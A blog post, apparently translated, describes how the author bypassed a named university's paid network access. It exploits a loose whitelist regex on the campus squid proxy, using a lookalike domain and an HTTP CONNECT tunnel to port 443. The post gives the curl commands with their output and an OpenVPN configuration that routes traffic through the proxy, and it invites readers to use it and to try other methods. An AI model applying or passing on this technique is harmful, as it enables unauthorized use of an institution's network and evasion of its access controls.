Contents

Next Generation Campus Network Free Flow

Contents

Make up for the recently discovered method of freeing the campus network. Recalling the CDN whitelist vulnerability, the proxy can be used in a variety of ways. For a while, I used it to bypass the campus Wi-Fi AP isolation (hahaha), and it seems to have spread from me (ha Ha ha). Since it was repaired, there are almost no cost-effective ways to avoid streaming recently to pay less than a dozen dollars. Although this proxy also supports http CONNECT, but the way of using it is very harsh, feel free to open fire.

Briefly talk about the discovery process and how to use it.

Discover

This agency was discovered from the blog of the network center, and it was set up to “conveniently sign up for students to sign up for campus card transfer”. Guess there will be CCB in the white list. Just tried it on the command line.

% all_proxy=http://proxy.neu.edu.cn:3128 curl -v http://www.ccb.com.cn
* Rebuilt URL to: http://www.ccb.com.cn/
*   Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
> GET http://www.ccb.com.cn/ HTTP/1.1
> Host: www.ccb.com.cn
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 OK
< Date: Sun, 20 Nov 2016 14:50:19 GMT
< Server: Apache
< Accept-Ranges: bytes
< Cache-Control: max-age=0
< Expires: Sun, 20 Nov 2016 14:50:19 GMT
< Vary: Accept-Encoding,User-Agent
< Content-Length: 2060
< Content-Type: text/html; charset=UTF-8
< X-Cache: MISS from proxy
< X-Cache-Lookup: MISS from proxy:3128
< Via: 1.1 proxy (squid/3.3.8)
< Connection: keep-alive
<
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm
...
<div class="tips">
  <div class="title"><img src="http://www.ccb.com/cn/img/jump/ico_tips.gif" />重要提示:</div>
    <div class="text">为了保证您正常访问建设银行网站,请您输入<span><a href="http://www.ccb.com">www.ccb.com</a></span></div>
</div>
...

Let’s see what it looks like to fail to match.

% all_proxy=http://proxy.neu.edu.cn:3128 curl -v http://www.baidu.com
* Rebuilt URL to: http://www.baidu.com/
*   Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
> GET http://www.baidu.com/ HTTP/1.1
> Host: www.baidu.com
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 403 Forbidden
< Server: squid/3.3.8
< Mime-Version: 1.0
< Date: Sun, 20 Nov 2016 14:47:59 GMT
< Content-Type: text/html
< Content-Length: 3136
< X-Squid-Error: ERR_ACCESS_DENIED 0
< Vary: Accept-Language
< Content-Language: en
< X-Cache: MISS from proxy
< X-Cache-Lookup: NONE from proxy:3128
< Via: 1.1 proxy (squid/3.3.8)
< Connection: keep-alive
<
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
...

Obviously it is a squid proxy, and the port can be seen.

But…well…it turns out that I wrote the wrong domain name, but in this case, if the administrator is lazy when writing the regex, it will probably be written directly as *.ccb.com*.

% all_proxy=http://proxy.neu.edu.cn:3128 curl -v http://www.ccb.com                             1 ↵
* Rebuilt URL to: http://www.ccb.com/
*   Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
> GET http://www.ccb.com/ HTTP/1.1
> Host: www.ccb.com
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 OK
< Date: Sun, 20 Nov 2016 14:49:11 GMT
< Server: Apache
< Accept-Ranges: bytes
< Cache-Control: max-age=0
< Expires: Sun, 20 Nov 2016 14:49:11 GMT
< Vary: Accept-Encoding
< Content-Length: 86
< Content-Type: text/html; charset=UTF-8
< Set-Cookie: BIGipServerccvcc_jt_197.1_80_web_pool=1361249034.20480.0000; path=/
< X-Cache: MISS from proxy
< X-Cache-Lookup: MISS from proxy:3128
< Via: 1.1 proxy (squid/3.3.8)
< Connection: keep-alive
<
<SCRIPT LANGUAGE="JavaScript">
  window.location="/cn/home/indexv3.html";
</SCRIPT>

use

Hehe, then use my domain name to post it. Open a simple server with python and accept the request.

all_proxy=http://proxy.neu.edu.cn:3128 curl -v http://www.ccb.com.rabit.pw:8080
* Rebuilt URL to: http://www.ccb.com.rabit.pw:8080/
*   Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
> GET http://www.ccb.com.rabit.pw:8080/ HTTP/1.1
> Host: www.ccb.com.rabit.pw:8080
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 OK
< Server: SimpleHTTP/0.6 Python/3.5.2
< Date: Sun, 20 Nov 2016 14:56:01 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 367
< X-Cache: MISS from proxy
< X-Cache-Lookup: MISS from proxy:3128
< Via: 1.1 proxy (squid/3.3.8)
< Connection: keep-alive
<
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="fucktyou">fucktyou</a></li>
<li><a href="go">go</a></li>
</ul>
<hr>
</body>
</html>
* Connection #0 to host proxy.neu.edu.cn left intact

OK, we already have a public network connection, try the http CONNECT tunnel again, if there is a loophole without this function, it will not be of much use. Here I use mitmproxy to reverse the http.server I just had, and the port remains unchanged

all_proxy=http://proxy.neu.edu.cn:3128 curl -v https://www.ccb
* Rebuilt URL to: https://www.ccb.com.rabit.pw:8080/
*   Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
* Establish HTTP proxy tunnel to www.ccb.com.rabit.pw:8080
> CONNECT www.ccb.com.rabit.pw:8080 HTTP/1.1
> Host: www.ccb.com.rabit.pw:8080
> User-Agent: curl/7.43.0
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 403 Forbidden
< Server: squid/3.3.8

Well, it seems that the proxy configuration can only choose which target port is allowed to connect. Then map my port to 443.

all_proxy=http://proxy.neu.edu.cn:3128 curl -v https://www.ccb.com.rabit.pw
* Rebuilt URL to: https://www.ccb.com.rabit.pw/
*   Trying 202.118.1.100...
* Connected to proxy.neu.edu.cn (202.118.1.100) port 3128 (#0)
* Establish HTTP proxy tunnel to www.ccb.com.rabit.pw:443
> CONNECT www.ccb.com.rabit.pw:443 HTTP/1.1
> Host: www.ccb.com.rabit.pw:443
> User-Agent: curl/7.43.0
> Proxy-Connection: Keep-Alive
>
< HTTP/1.1 200 Connection established
<
* Proxy replied OK to CONNECT request
* SSL certificate problem: Invalid certificate chain
* Closing connection 0
curl: (60) SSL certificate problem: Invalid certificate chain
More details here: http://curl.haxx.se/docs/sslcerts.html

OK, we now have a free public internet connection on tcp 443 port. The next use is easy. exist www.ccb.com.your.domain:443 First, deploy an openvpn with tcp protocol, it is best to use tun, and then add a few lines to the default configuration file, and it will be OK.

http-proxy proxy.neu.edu.cn 3128
# 校内网段绕过代理
route 58.154.160.0 255.255.224.0 net_gateway
route 58.154.192.0 255.255.192.0 net_gateway
route 58.195.85.192 255.255.255.240 net_gateway
route 58.200.30.128 255.255.255.128 net_gateway
route 118.202.0.0 255.255.224.0 net_gateway
route 118.202.32.0 255.255.240.0 net_gateway
route 202.118.0.0 255.255.224.0 net_gateway
route 202.199.0.0 255.255.240.0 net_gateway
route 202.206.16.0 255.255.248.0 net_gateway
route 210.30.192.0 255.255.240.0 net_gateway
route 219.216.64.0 255.255.192.0 net_gateway
route 172.16.0.0 255.240.0.0 net_gateway

As for other postures, there is a modified version of SS with an http header, and tinyproxy with a pseudo-header. Refer to other free streams and develop them yourself~